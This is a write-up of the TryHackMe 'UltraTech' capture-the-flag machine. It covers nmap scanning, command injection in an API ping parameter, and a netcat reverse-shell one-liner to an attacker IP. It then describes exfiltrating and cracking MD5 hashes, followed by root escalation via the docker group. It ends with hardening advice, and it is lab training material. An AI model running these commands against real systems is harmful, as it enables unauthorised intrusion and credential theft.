“UltraTech” is a boot2root machine on TryHackMe. It has intermediate difficulty. You have been contracted by UltraTech to pentest their infrastructure. It is a grey-box kind of assessment, the only information you have is the company’s name and their server’s IP address.
Initial access to the machine could be obtained through a command injection vulnerability in the API. After that credentials could be dumped from a SQLITE database file. The hashed passwords could be cracked. The credentials were used to escalate privileges to another user on the box. The user was inside the
docker group. This was used to escalate the privileges further to root.
First of all an Nmap scan was used to scan all ports on the target machine.
sudo nmap -p- -oN nmap/all -vv 10.10.29.189
In the next step, version enumeration, script scanning and OS enumeration were conducted on the previously discovered ports with Nmap.
sudo nmap -p21,22,8081,31331 -sC -sV -O 10.10.29.189 -oN nmap/scripts -vv
The landing page of the web service on port 8081 showed an API running.
On port 31331 the company web site was served.
A robots.txt file could be found on the web page. This file revealed that there is a file called “utech_sitemap.txt”.
The sitemap revealed further “hidden” pages.
The interesting page here is “partners.html”. This page contains a login form.
If a user tries to login, the credentials are send to “http://10.10.29.189:8081/auth”. Furthermore the web app was calling the URL “http://10.10.29.189:8081/ping?ip=10.10.29.189” to check if the API is still running. It was possible to ping the attacker machine by changing the
The filter on the parameter
ip could be evaded by following payload:
The following bash script was created and served by the attacker via HTTP.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.73.174 443 >/tmp/f
The file was then uploaded to the victim by calling the following URL
After calling the following URL, the victim connected to a Netcat listener of the attacker.
After getting the shell, there was a SQLITE database file inside the current working directory. This file has been exfiltrated to be able to analyze it.
The SQLITE database contained MD5 hashes of two users.
Both password hashes could be successfully cracked with Crackstation.
Privilege Escalation to r00t
“r00t” is also a user on the box. A privilege escalation to “r00t” was possible because of a password reuse.
At this point it was also possible to login via SSH to the service with r00t’s credentials. Furthermore the r00t user is in the “docker” group as you can see in the above picture.
The privilege escalation could be accomplished by abusing the
docker run -v /root:/mnt -it bash
The filter on the API should be hardened. Furthermore functionality that is not ready to use, should not be deployed on a live machine. Also passwords should not be hashed with the MD5 hash function. An appropriate password hashing function should be used instead, e.g. PBKDF2. Also the password policy should prohibit the use of common passwords. The reuse of password should also be prohibited. Users of the organization should be encouraged to follow the password policy. Also keep in mind that adding a user to the
docker group, will also give them root rights. The user r00t should not be in the
docker group if not needed.